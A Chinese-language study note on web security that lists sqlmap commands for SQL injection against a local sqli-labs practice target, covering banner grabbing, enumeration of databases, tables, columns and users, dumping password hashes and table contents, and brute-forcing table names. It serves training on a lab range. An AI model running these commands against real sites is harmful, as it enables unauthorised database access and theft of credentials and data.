sqlmap 检索 DBMS 信息

Web安全攻防学习笔记

一、Sqlmap 检索 DBMS 信息

1.1、sqlmap 检索 DBMS banner

 # 获取后端数据库的 banner 信息, 参数 --banner 或者 -b$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -b

1.2、sqlmap 检索 DBMS 当前数据库

 # 获取当前数据库名, 参数 --current-db$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --current-db# 当然, 每次探测新网址的时候都会有许多需要选的选择, 如果不想选可以添加一个参数 --batch 选择默认选项

1.3、sqlmap 检索 DBMS 当前主机名

 # 获取主机名, 参数 --hostname$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --hostname

1.4、sqlmap 检索当前用户身份信息

 # 探测当前用户是否是数据库管理员, 参数 --is-dba$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --is-dba

1.5、sqlmap 检索 DBMS 用户密码

 # Sqlmap 会先列举用户, 再列举用户密码 Hash 值, 参数 --passwords# 这命令也有点鸡肋, 因为如果密码不是 Hash 值就探测不出来（而且还不太准确）$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --passwords

1.6、sqlmap 检索 DBMS 用户

 # 获取 DBMS 所有用户, 参数 --users$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --users

二、sqlmap 枚举信息

2.1、sqlmap 枚举 DBMS 权限

当前用户有读取包含了数据库管理系统中用户信息的系统表的权限时使用 --privileges 参数可以列举数据库管理系统中用户的权限。通过用户权限可以判断哪些用户是管理员。

若想只枚举特定用户的权限使用参数 "-U" 指定用户，可用 "CU" 来代表当前用户。

 $ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --privileges -U root# 加个线程设置 --threads 5 能提高探测速度# 命令都是可以组合使用的, 不区分先后顺序

2.2、sqlmap 枚举数据库名

 # 列举数据库名, 参数 --dbs$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --dbs

2.3、sqlmap 枚举数据库表

 # 列举数据库表名, 参数 --tables # 若要指定具体数据库, 添加参数: -D 数据库名字$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --tables -D security

2.4、sqlmap 枚举数据库表的列

 # 列举数据库表的列, 参数 --columns# 若要指定具体库的指定具体表的列, 添加参数: -D 数据库名字 -T 数据库名字$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security --columns -T users

2.5、sqlmap 枚举数据库表的值

 # 列举数据库表的值, 参数 --dump$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users --dump

2.6、sqlmap 枚举数据库表的条目数

 # 如果用户只想知道表的条目数, 则可以使用此参数 --count$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security --count

2.7、sqlmap 枚举 schema 信息

用户可用此选项列举数据库管理系统的模式。模式列表包含所有数据库、表、列、触发器和他们各自的类型。同样地，可使用参数 --exclude-sysdbs 排除系统数据库。

 # 如果用户只想知道表的条目数, 则可以使用此参数 --count# 东西太多就不截图了$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --schema$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --schema --exclude-sysdbs

2.8、sqlmap 获取数据信息

 # --start 1 --stop 3 返回当前数据库表的第一条到第三条信息记录$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users --start 3 --stop 6 --dump

2.9、sqlmap 设置条件获取信息

 # 也很少用到 $ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users --where="id>2" --dump

2.10、sqlmap 暴力破解表名

有些情况下用 --tables 不能列出数据库中表名来比如：

版本小于 5.0 的 MySQL 没有 information_schema 表
数据库用户权限过低无法读取表名

 # 参数 --common-tables $ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --common-tables

2.10、sqlmap 暴力破解列名

 # 当然要先指定表, 参数 --common-columns$ python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" -D security -T users --common-columns

2.11、sqlmap 检索所有信息

 # 返回所有的检索信息, 参数 -a 或者--all

练习靶场：https://www.mozhe.cn/bug/d1hJazFDeGRHV05DVjI3YXpHREZGUT09bW96aGUmozhe